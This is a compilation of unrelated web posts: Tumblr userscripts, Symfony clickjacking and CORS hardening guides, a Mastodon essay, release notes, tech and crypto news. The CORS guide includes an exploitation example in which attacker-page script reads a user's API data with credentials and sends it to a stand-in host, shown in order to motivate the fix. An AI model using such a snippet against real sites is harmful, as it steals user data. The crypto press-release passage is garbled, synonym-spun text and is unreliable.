A quick Stylus script to make Tumblr's new sidebars a little less crowded and more comfortable

So, that new sidebar, yeah? Sure is a thing. The tumblr devs might change things before it's fully implemented across the board, and Xkit Rewritten might add some options after the interface moves from testing to permanent -- but until they do, here's a little fix to spread things out a little, so that your tumblr experience doesn't feel so squished. It results in a dash like this:

which is a little more comfortable than the original, I think.

To install the script, first make sure you install the addon/extension Stylus, if you don't have it already. And then, well, simply click here, and click "install" to add the style. Enjoy your more wide open spaces!

(Code under the cut for advanced users; comments or suggestions are welcome. You're also free to modify your own copies for any sidebar width or spacing you prefer.)

/* ==UserStyle== @name Tumblr - New Sidebar Fixes @namespace https://nobodysuspectsthebutterfly.tumblr.com @author Mindset @description Moves Tumblr's new sidebars outward to make things a little less crowded. @version 1.3 @license GPL-3.0-or-later ==/UserStyle== */ @-moz-document domain("tumblr.com") { /* makes sure this only applies to page sizes where the sidebars appear */ @media (min-width: 1150px) { /* moves the left sidebar further left */ .ZkG01 .h_Erh { margin-right: 100px !important; margin-left: -90px !important; } /* keeps the center section the width it should be and moves the right sidebar to the right */ .ZkG01 .lSyOz { min-width: 625px !important; padding-right: 100px !important; } /* keeps the right sidebar the width it should be */ .ZkG01 .e1knl { min-width: 320px !important; } } }

Symfony Clickjacking Prevention Guide

Clickjacking is a deceptive technique where attackers trick users into clicking on hidden elements, potentially leading to unauthorized actions. As a Symfony developer, it's crucial to implement measures to prevent such vulnerabilities.

🔍 Understanding Clickjacking

Clickjacking involves embedding a transparent iframe over a legitimate webpage, deceiving users into interacting with hidden content. This can lead to unauthorized actions, such as changing account settings or initiating transactions.

🛠️ Implementing X-Frame-Options in Symfony

The X-Frame-Options HTTP header is a primary defense against clickjacking. It controls whether a browser should be allowed to render a page in a <frame>, <iframe>, <embed>, or <object> tag.

Method 1: Using an Event Subscriber

Create an event subscriber to add the X-Frame-Options header to all responses:

// src/EventSubscriber/ClickjackingProtectionSubscriber.php namespace App\EventSubscriber; use Symfony\Component\EventDispatcher\EventSubscriberInterface; use Symfony\Component\HttpKernel\Event\ResponseEvent; use Symfony\Component\HttpKernel\KernelEvents; class ClickjackingProtectionSubscriber implements EventSubscriberInterface { public static function getSubscribedEvents() { return [ KernelEvents::RESPONSE => 'onKernelResponse', ]; } public function onKernelResponse(ResponseEvent $event) { $response = $event->getResponse(); $response->headers->set('X-Frame-Options', 'DENY'); } }

This approach ensures that all responses include the X-Frame-Options header, preventing the page from being embedded in frames or iframes.

Method 2: Using NelmioSecurityBundle

The NelmioSecurityBundle provides additional security features for Symfony applications, including clickjacking protection.

Install the bundle:

composer require nelmio/security-bundle

Configure the bundle in config/packages/nelmio_security.yaml:

nelmio_security: clickjacking: paths: '^/.*': DENY

This configuration adds the X-Frame-Options: DENY header to all responses, preventing the site from being embedded in frames or iframes.

🧪 Testing Your Application

To ensure your application is protected against clickjacking, use our Website Vulnerability Scanner. This tool scans your website for common vulnerabilities, including missing or misconfigured X-Frame-Options headers.

Screenshot of the free tools webpage where you can access security assessment tools.

After scanning for a Website Security check, you'll receive a detailed report highlighting any security issues:

An Example of a vulnerability assessment report generated with our free tool, providing insights into possible vulnerabilities.

🔒 Enhancing Security with Content Security Policy (CSP)

While X-Frame-Options is effective, modern browsers support the more flexible Content-Security-Policy (CSP) header, which provides granular control over framing.

Add the following header to your responses:

$response->headers->set('Content-Security-Policy', "frame-ancestors 'none';");

This directive prevents any domain from embedding your content, offering robust protection against clickjacking.

🧰 Additional Security Measures

CSRF Protection: Ensure that all forms include CSRF tokens to prevent cross-site request forgery attacks.

Regular Updates: Keep Symfony and all dependencies up to date to patch known vulnerabilities.

Security Audits: Conduct regular security audits to identify and address potential vulnerabilities.

📢 Explore More on Our Blog

For more insights into securing your Symfony applications, visit our Pentest Testing Blog. We cover a range of topics, including:

Preventing clickjacking in Laravel

Securing API endpoints

Mitigating SQL injection attacks

🛡️ Our Web Application Penetration Testing Services

Looking for a comprehensive security assessment? Our Web Application Penetration Testing Services offer:

Manual Testing: In-depth analysis by security experts.

Affordable Pricing: Services starting at $25/hr.

Detailed Reports: Actionable insights with remediation steps.

Contact us today for a free consultation and enhance your application's security posture.

Avoiding Success At Some Cost, Successfully

Back when Mastodon was new, some people really wanted it to succeed, some people really wanted it to be the next twitter, and some people thought in order to succeed, it must turn into twitter.

Mastodon quickly gained some momentum, and professional bloggers churned out listicles explaining why people like mastodon, what mastodon must do next, why mastodon will collapse, or why mastodon won't be the next twitter.

The problem with all these takes is simple: Mastodon users went to mastodon because it wasn't twitter. Twitter had tens of millions of users, movie stars, sports celebrities, advertisements, a global namespace, brands, politicians, cashtags, blue checkmarks for notable people, trendy New York writers, journalists, an official Trust and Safety Council, and so on.

Mastodon didn't have that. Many people went to mastodon because it didn't have advertising, or because it didn't have journalists. That's not to say that journalists couldn't join mastodon. Journalists didn't join mastodon because they had to network with other people for work, or because they had to tweet out their stories, or to DM people they wanted to interview. Journalists who joined mastodon did so just to be on mastodon. If mastodon ever becomes successful, people will probably feel the need to have a mastodon presence for work, and that will cause more knock-on effects.

People joined mastodon because it wasn't twitter, because it wasn't global, because it wasn't commercialised, because it wasn't full of those people, whoever they were. There was a bit of confusion and contention about who mastodon was for, and what federation was for. Was mastodon for people like you, or was it for everybody? Is a mastodon instance a tight-knit community and a heavily moderated space with barriers to entry, or is a mastodon URL like an e-mail address, where the part behind the @ doesn't matter all that much because you can e-mail people at other domains all the time?

You can always join an instance full of people who agree with your ideas on federation, but you can't force the others to federate with you.

It's somewhat reassuring that the recent success of bluesky tracks with my ideas about mastodon. Bluesky may have "learned from the mistakes" of mastodon, or maybe it just made different choices to reach different goals. One goal of bluesky was growth. Bluesky became twitter without twitter, and it has quickly recreated many of the the social dynamics of twitter in 2012. Some bluesky users are now bemoaning that the site, with its 25 million users, is starting to look more and more like twitter.

I don't know if there is anything else to learn here. Ello, Gab, Minds, Threads, and Google Buzz all tried to be the next twitter, and bluesky actually succeeded. Bluesky didn't try to be a social network for close friends, but neither did the others. Maybe it was all in the timing.

I'll probably stay on mastodon for the foreseeable future, at least until the user base of bluesky comes to terms with the fact that the site is slowly turning into twitter, and that it can't be "popular" and "successful" without having all the people and corporations on there.Statistically, some of these are jerks.

But the next time I'm adding a "tweet this" button to a game to share your high score, I'll have to add an option to post to mastodon or bluesky instead.

If these

and this

bother you cos you oddly hyperfixate on stupid shit like me...

Here, I made a quick script. You need greasemonkey or tampermonkey to run it (or idk, copypaste on console whenever you open tumblr I don't judge).

// ==UserScript== // @name TumblrRadardeleter // @namespace http://tampermonkey.net/ // @version 0.1 // @description Removes bothersome shit // @author Noparg // @match https://www.tumblr.com/* // @icon https://www.google.com/s2/favicons?sz=64&domain=tumblr.com // @grant none // ==/UserScript==

(function() { 'use strict';

window.addEventListener('popstate', function () { location.reload() }); document.addEventListener("readystatechange", wank) function wank(){ if(document.readyState == "complete"){ const elements = document.getElementsByTagName("aside") while(elements[0].firstElementChild.nextElementSibling!=null){elements[0].firstElementChild.nextElementSibling.remove()}

//elements[0].firstElementChild.nextElementSibling.remove() // Your code here… })();

I made it in 10 mins cos I'm bored and cba to zap elements with ublock, it's prolly not optimal or even close to but whatever.

Version 617

windows

zip

exe

macOS

app

linux

tar.zst

I took an easy week, so I just have a couple bug fixes!

full changelog

highlights

If you need to import gigantic AVIF or HEIF files, like > 15,000x15,000, they should now work!

The e6ai downloader now grabs the 'director' tag under the 'creator' namespace. Thanks to the users who let me know how they do this.

If you have clever custom tag or note import options, I have added 'Gallery URL' url classes to the network->downloaders->manage default import options dialog. This allows us to set custom options for downloaders that have a gallery url that produces direct File URLs, just like the new e621 downloaders I rolled out last week. If you would like custom import options for the new e621 downloaders, please go in there and set up custom options for both the 'eXXX file page api' and 'eXXX gallery page api' classes--use the copy/paste buttons to make it easier. I generally do not like how complicated this has worked out, so if you would prefer it just work on domain--or really wouldn't want that--let me know what you think!

If you need to do a lot of file duplicates reset work, the commands for 'dissolve duplicate group', 'dissolve alternates group', 'delete false positives', 'reset potential search', and 'remove potential pairs' are now added as mappable actions for the 'media' shortcut set. These are powerful commands, always wrapped in a yes/no confirmation.

next week

I have some bug reports to put time into, and if I have time I will do a bit more duplicates auto-resolution tech.

Advanced Container Networking Services Features Now In AKS

With Advanced Container Networking Services, which are now widely accessible, you may improve your Azure Kubernetes service’s operational and security capabilities.

Containers and Kubernetes are now the foundation of contemporary application deployments due to the growing popularity of cloud-native technologies. Workloads in containers based on microservices are more portable, resource-efficient, and easy to grow. Organizations may implement cutting-edge AI and machine learning applications across a variety of computational resources by using Kubernetes to manage these workloads, greatly increasing operational productivity at scale. Deep observability and built-in granular security measures are highly desired as application design evolves, however this is difficult due to containers’ transient nature. Azure Advanced Container Networking Services can help with that.#Machinelearning #AzureKubernetesServices #Kubernetes #DomainNameService #DNSproxy #News #Technews #Technology #Technologynews #Technologytrendes #Govindhtech @Azure @govindhtech

Advanced Container Networking Services for Azure Kubernetes Services (AKS), a cloud-native solution designed specifically to improve security and observability for Kubernetes and containerized environments, is now generally available. Delivering a smooth and integrated experience that enables you to keep strong security postures and obtain comprehensive insights into your network traffic and application performance is the major goal of Advanced Container Networking Services. You can confidently manage and scale your infrastructure since this guarantees that your containerized apps are not only safe but also satisfy your performance and reliability goals.Image credit to Microsoft Azure

Let’s examine this release’s observability and container network security features.

Container Network Observability

Although Kubernetes is excellent at coordinating and overseeing various workloads, there is still a significant obstacle to overcome: how can we obtain a meaningful understanding of the interactions between these services? Reliability and security must be guaranteed by keeping an eye on microservices’ network traffic, tracking performance, and comprehending component dependencies. Performance problems, outages, and even possible security threats may go unnoticed in the absence of this degree of understanding.

You need more than just virtual network logs and basic cluster level data to fully evaluate how well your microservices are doing. Granular network metrics, such as node-, pod-, and Domain Name Service (DNS)-level insights, are necessary for thorough network observability. Teams can use these metrics to track the health of each cluster service, solve problems, and locate bottlenecks.

Advanced Container Networking Services offers strong observability features designed especially for Kubernetes and containerized settings to overcome these difficulties. No element of your network is overlooked thanks to Advanced Container Networking Services’ real-time and comprehensive insights spanning node-level, pod-level, Transmission Control Protocol (TCP), and DNS-level data. These indicators are essential for locating performance snags and fixing network problems before they affect workloads.

Among the network observability aspects of Advanced Container Networking Services are:

Node-level metrics: These metrics give information about the volume of traffic, the number of connections, dropped packets, etc., by node. Grafana can be used to view the metrics, which are saved in Prometheus format.

Hubble metrics, DNS, and metrics at the pod level: By using Hubble to gather data and using Kubernetes context, such as source and destination pod names and namespace information, Advanced Container Networking Services makes it possible to identify network-related problems more precisely. Traffic volume, dropped packets, TCP resets, L4/L7 packet flows, and other topics are covered by the metrics. DNS metrics that cover DNS faults and unanswered DNS requests are also included.

Logs of Hubble flow: Flow logs offer insight into workload communication, which facilitates comprehension of the inter-microservice communication. Questions like whether the server received the client’s request are also addressed by flow logs. How long does it take for the server to respond to a client’s request?

Map of service dependencies: Hubble UI is another tool for visualizing this traffic flow; it displays flow logs for the chosen namespace and builds a service-connection graph from the flow logs.

Container Network Security

The fact that Kubernetes by default permits all communication between endpoints, posing significant security threats, is one of the main issues with container security. Advanced fine-grained network controls employing Kubernetes identities are made possible by Advanced Container Networking Services with Azure CNI powered by Cilium, which only permits authorized traffic and secure endpoints.

External services regularly switch IP addresses, yet typical network policies use IP-based rules to regulate external traffic. Because of this, it is challenging to guarantee and enforce consistent security for workloads that communicate outside of the cluster. Network policies can be protected against IP address changes using the Advanced Container Networking Services’ fully qualified domain name (FQDN) filtering and security agent DNS proxy.

FQDN filtering and security agent DNS proxy

The Cilium Agent and the security agent DNS proxy are the two primary parts of the solution. When combined, they provide for more effective and controllable management of external communications by easily integrating FQDN filtering into Kubernetes clusters.

Read more on Govindhtech.com

New rankings: Top .com domain name registrars

These are the largest .com domain name registrars. ICANN has published the latest data from Verisign (NASDAQ: VRSN) covering the .com namespace. The data covers July 2024. A few things stand out in this month’s report: Hostinger had another strong month. While Porkbun’s stay in the top ten lasted only a month, it still had […] Post link: New rankings: Top .com domain name registrars ©…

Roundcube Webmail 1.5.9 / 1.6.9

Versies 1.5.9 en 1.6.9 van Roundcube Webmail zijn uitgekomen. Roundcube Webmail heeft onder andere ondersteuning voor gedeelde mappen en namespaces, internationalized domain names en smtp-delivery status-notificaties. Daarnaast is de gebruikersinterface voor IMAP-mappen aangepast om zo meer ruimte te bieden voor extensies en plug-ins. De changelog voor deze uitgave kan hieronder worden gevonden: Updates 1.6.9 and 1.5.9 released http://dlvr.it/TCfXhM

Such behavior from a company like Sony posed a problem for the security community and everyone else. It’s difficult to fight skilled hackers out for fun. It’s difficult to fight experienced, financially motivated criminal operations. But fighting a billion-dollar, corporate-funded hacking operation is impossible.

Explorations in Namespace: White-Hat Hacking Across the Domain Name System by Dan Kaminski in Communications of the ACM, 2006 June

TamperMonkey Script for the Tumblr booper

Replace the match with the url of a user and then visit that url. // ==UserScript== // @name Booper // @namespace http://tampermonkey.net/ // @version 2024-04-01 // @description I just want some medals man // @author You // @match REPLACE THIS WITH A USER URL YOU WANT TO BOOP // @icon https://www.google.com/s2/favicons?sz=64&domain=tumblr.com // @grant none // ==/UserScript==

(function() { 'use strict';const butclass1 = 'button[class*="TRX6J CxLjL qjTo7 IMvK3 zq7p5 qNKBC"]'; const butclass2 = 'button[class*="TRX6J cYyad coRbX"]'; const interval = 750; function clickButton() { const button = document.querySelector(butclass1); if (button) { button.click(); setTimeout(interval); document.querySelector(butclass2).click(); } else { console.log(button); } } setInterval(clickButton, interval); // Your code here...

})();

Node.js for the win

For the Bible Project (see earlier posts), switching to a Public Domain version wasn't that difficult on the JavaScript side of things. Server-side, taking the data and writing it to a file was very easy with Node.js, Express.js, and Node's file namespace (specifically writeFileSync()).

Client-side, the JavaScript was rather simple, and having DOM-parsed a number of kinds of Bible-related web pages over the past few weeks, redoing my work came naturally, along with some things I wish I had done, such as checking whether the verses I was pulling were proceeding 1-by-1 with no skips or misses. If the DOM-parser found a missing verse or verses, it would use prompt() to ask if I wanted to continue processing (and the answer was always no, since it usually meant I was missing HTML element CSS classes I needed to parse).

This time, I automated the client-side process fully, waiting just 1 ms between the data having been pushed to the server successfully and me changing the window.location to the next chapter/page for parsing. The entire Bible probably took about 5 to 10 minutes to process, were I to do it all at once. Since I had to stop and change things for skipped verses, I don't know exactly how long it took, just that it was about a page or two each second and 1189 pages / 2 per second = 594.5 seconds, which would be about 10 minutes.

The start of the process, which occurred on page load, also prompted to be sure I wanted to start going page-to-page.

To add the client side JavaScript to the HTML I wanted to scrub, I used PowerShell to append the contents of a file to the bottom of every page representing a Bible chapter (and I found those filtering directory list results by the name of each file).

For the Worldwide English Bible, I also got all the Apocrypha / Deuterocanonical books, but I've skipped those for post parsing, sticking to the 1189 chapters/pages I expect and want to handle first. Still, I do have the JSON for the extra content, which is over 200 pages/chapters.

My text replace list had over 500 entries for the NIV Bible, so I had to translate those into the W.E. Bible. That was a complex project to itself, so I'll detail it in the next post, but suffice to say that I love the flexibility and power of PowerShell to work against CSV and JSON files as objects. The syntactic sugar of that programming CLI made everything I wanted to do rather easy and easy to prototype before going whole hog. For instance, Select-Object -First 2 came in *really* handy to make sure I would get what I wanted for a small subset for each step of translating text replacements from one version to another. The original goal of my project, which was simply to see what the Bible looked like taking the word "Lord" and replacing it with "Earl" happened a while back. It just seems like a cool thing to be able to do just for fun.

- The UK Government has decided to regulate crypto in their country after consultation with a number of people from crypto background.

- JPEG'd alerted their community about the phishing scammers who continue to target crypto on their platform

- Sam Bankman Fried, in his trial, is being grilled over his contrading statements by the prosecutor

- Unstoppable Domains, a web3 domain company enters the .com namespace. It has now become the first one to offer both Web2 and Web3 domains names for buying.

- Bitcoin continues to moon in 'Uptober', achieving the high of $34,911.49

CORS Misconfigurations in Symfony: Fix & Secure

🔐 Cross-Origin Resource Sharing (CORS) Misconfigurations in Symfony

Cross-Origin Resource Sharing (CORS) is an essential part of modern web applications, allowing browsers to safely make requests to different domains. However, when misconfigured—especially in frameworks like Symfony—it can expose your application to severe security risks.

In this blog, we’ll explore how CORS misconfigurations occur in Symfony, how attackers exploit them, how to fix them properly, and how to validate your security posture using our Website Vulnerability Scanner online free.

👉 Also, check out more security blogs at the Pentest Testing Blog.

⚠️ What is CORS and Why is Misconfiguration Dangerous?

CORS defines how a browser and server interact to determine whether a cross-origin request is safe. For example, if your Symfony app running on api.yourapp.com allows requests from any domain (*), you’re giving attackers the opportunity to steal user credentials or sensitive data using malicious scripts.

Common symptoms of CORS misconfiguration:

Access-Control-Allow-Origin: * used for private APIs

Insecure dynamic origins without proper validation

Allowing sensitive methods like PUT/DELETE without authentication

🧪 Example of a Vulnerable Symfony CORS Configuration

Let’s say you’re using NelmioCorsBundle for CORS handling in Symfony. Below is a problematic config:

# config/packages/nelmio_cors.yaml nelmio_cors: defaults: allow_origin: ['*'] allow_methods: ['GET', 'POST', 'PUT', 'DELETE'] allow_headers: ['*'] max_age: 3600 paths: '^/api/': allow_origin: ['*']

This configuration allows all domains to make any kind of request to your API routes — a textbook case of CORS misconfiguration.

🧰 Exploitation Example: How Attackers Abuse It

Imagine a malicious actor sets up a fake site:

<!-- evil-attacker-site.com --> <script> fetch("https://api.yourapp.com/api/user", { credentials: "include" }) .then(response => response.json()) .then(data => { // Send to attacker's server fetch("https://evil-attacker.com/steal", { method: "POST", body: JSON.stringify(data) }); }); </script>

If your Symfony API returns Access-Control-Allow-Origin: * and includes credentials, this attack works seamlessly.

✅ Secure Symfony CORS Configuration

Fixing this issue is as simple as applying a strict whitelist:

# config/packages/nelmio_cors.yaml nelmio_cors: defaults: allow_origin: ['https://yourapp.com', 'https://admin.yourapp.com'] allow_credentials: true allow_methods: ['GET', 'POST'] allow_headers: ['Content-Type', 'Authorization'] max_age: 3600 paths: '^/api/': allow_origin: ['https://yourapp.com']

👉 This ensures that only trusted domains can access your protected resources.

📷 Free Website Vulnerability Scanner

➡️ Screenshot of the Website Vulnerability Scanner webpage

Screenshot of the free tools webpage where you can access security assessment tools.

🖥️ Validating Fixes Using Our Free Tool

You don’t need to guess whether your app is secure. Just visit our Free Website Security Scanner and run a scan on your Symfony app. The scanner will flag common misconfigurations, including insecure CORS headers.

—

📷 Vulnerability Assessment Report

🖼️ Screenshot of a report generated by our tool to check Website Vulnerability

An Example of a vulnerability assessment report generated with our free tool, providing insights into possible vulnerabilities.

—

📦 Real-World Fix: CORS Middleware in Symfony

You can also write your custom middleware to intercept requests:

// src/EventListener/CorsListener.php namespace App\EventListener; use Symfony\Component\HttpKernel\Event\ResponseEvent; class CorsListener { public function onKernelResponse(ResponseEvent $event) { $response = $event->getResponse(); $request = $event->getRequest(); if (strpos($request->getPathInfo(), '/api/') === 0) { $origin = $request->headers->get('Origin'); if (in_array($origin, ['https://yourapp.com', 'https://admin.yourapp.com'])) { $response->headers->set('Access-Control-Allow-Origin', $origin); $response->headers->set('Access-Control-Allow-Credentials', 'true'); $response->headers->set('Access-Control-Allow-Headers', 'Content-Type, Authorization'); } } } }

Then register the listener in your services.yaml:

services: App\EventListener\CorsListener: tags: - { name: kernel.event_listener, event: kernel.response }

—

🛠️ Need Help Securing Your Symfony App?

If you're running a production web app, we highly recommend a full penetration test. Our team of experts can help:

🔎 Explore our services: 👉 Web App Penetration Testing Services

🤝 Want to resell or white-label our services? 👉 Offer Cybersecurity Services to Your Clients

—

📬 Stay Updated on Threats & Fixes

Subscribe to our latest cybersecurity newsletter to stay ahead of vulnerabilities and new security insights.

🔔 Subscribe on LinkedIn

—

✍️ Final Thoughts

CORS misconfigurations are a silent but critical vulnerability in many Symfony applications. Don’t leave your APIs exposed. Follow secure coding practices, whitelist trusted domains, avoid wildcards, and scan your website regularly for a Website Security test using tools like the one we offer.

For more articles like this, visit our cybersecurity blog.

—

💬 Have questions or need help hardening your Symfony app? Drop us a message or explore our full range of services.

Web3 area service supplier – Unstoppable Domains – has introduced foraying the .com Namespace permitting customers to buy “.com” addresses. The choice to enter the world’s hottest sort of conventional web2 top-level area (TLD), which boasts over 157 million registrations by way of its web site, aligns with its current growth efforts. Enlargement In accordance with the official press launch shared with CryptoPotato, Unstoppable Domains has develop into the primary participant within the trade to supply each conventional .com domains and third-party Web3 domains to be used in web3. The corporate plans to allow all of the options at the moment out there for web3 domains to work with customers’ .com domains. Commenting on the corporate’s transfer to broaden its choices, Matt Gould, CEO and founding father of Unstoppable Domains, mentioned, “We're thrilled to broaden our choices into the world of Web2, enabling customers to purchase such iconic domains as .com alongside their Web3 addresses – all through a single platform. This can be a main milestone that continues Unstoppable’s mission to develop into a one-stop store for web3 domains – together with conventional web2 domains which might be web3 enabled. By uniting each Web3 and Web2, Unstoppable creates an enormous alternative to onboard much more customers to the area area, bridging web2 and web3 “ The press launch additionally mentioned that its clients will quickly be capable to connect digital wallets to Unstoppable-managed .com domains, enabling them to obtain and ship crypto to those easy-to-remember addresses by way of a user-friendly, unified interface like Coinbase Pockets and Metamask. Along with the pockets integration, Unstoppable mentioned that it additionally affords numerous conveniences for web3 domains. This contains the Unstoppable Vault for simple area storage, auto-renewal, login, messaging, profiles, and extra. The corporate has a collection of deliberate updates within the pipeline already so as to add extra performance to its domains. Since people, corporations, and types will seemingly wish to retain each Web3 and Web2 addresses, similar to .com, for his or her platforms and identities, Unstoppable seeks to handle this space that may enable them to conveniently achieve this in a single place. Unstoppable’s Development Trajectory Unstoppable has round 3.9 million registered domains. The Web3 area supplier just lately launched ‘Unstoppable Messaging’ – an end-to-end encrypted Web3 area messenger – that seeks to assist Web3 individuals join with associates, keep up to date on their tasks, and enhance communities in a decentralized method whereas retaining privateness. Earlier than that, Unstoppable announced including help for ENS area endings this 12 months. SPECIAL OFFER (Sponsored) Binance Free $100 (Unique): Use this link to register and obtain $100 free and 10% off charges on Binance Futures first month (terms).PrimeXBT Particular Provide: Use this link to register & enter CRYPTOPOTATO50 code to obtain as much as $7,000 in your deposits.

I've been trying to use tampermonkey to get rid of the clown and I fucking give up. when I run the code I've written in console it executes without error, when it is in tamper monkey it throws an exception at the important lines. here's what I've got:

// ==UserScript== // @name Tim from Clown // @namespace http://tampermonkey.net/ // @version 0.1 // @description try to take over the world! // @author You // @match https://addons.mozilla.org/en-US/firefox/ // @icon https://www.google.com/s2/favicons?sz=64&domain=mozilla.org // @match ://www.tumblr.com/ // @match ://.tumblr.com/* // ==/UserScript==

(function() { 'use strict'; // Your code here… //test if running remove later; not source of error alert("it got here"); //functional bit var a = document.getElementsByClassName("RWr4x") a.item(0).src="https://66.media.tumblr.com/b5933548fceb6bfcc6a35aa8524e6847/54446f53f54b48c8-b6/s640x960/102bac8f790d5ec99f75444b4eea0c925ece703f.png"; //alert in case above line executes and doesn't work alert("it got here 4"); })();

when I copy paste the functional bit into the console it works perfectly and Tim takes the clown's place. But when I run tamper monkey, well, it says that a.item(0) is null and throws a typeerror.

hell yes, i have defeated the last tendril of the horror terror google

turns out my new domain provider imported corrupt namespace A/AAAA records.

hooray

Haha whoops

Most of my domains are down because I tried to flee googles rot. Gonna try to get them back up during my lunch break, failing that, later today.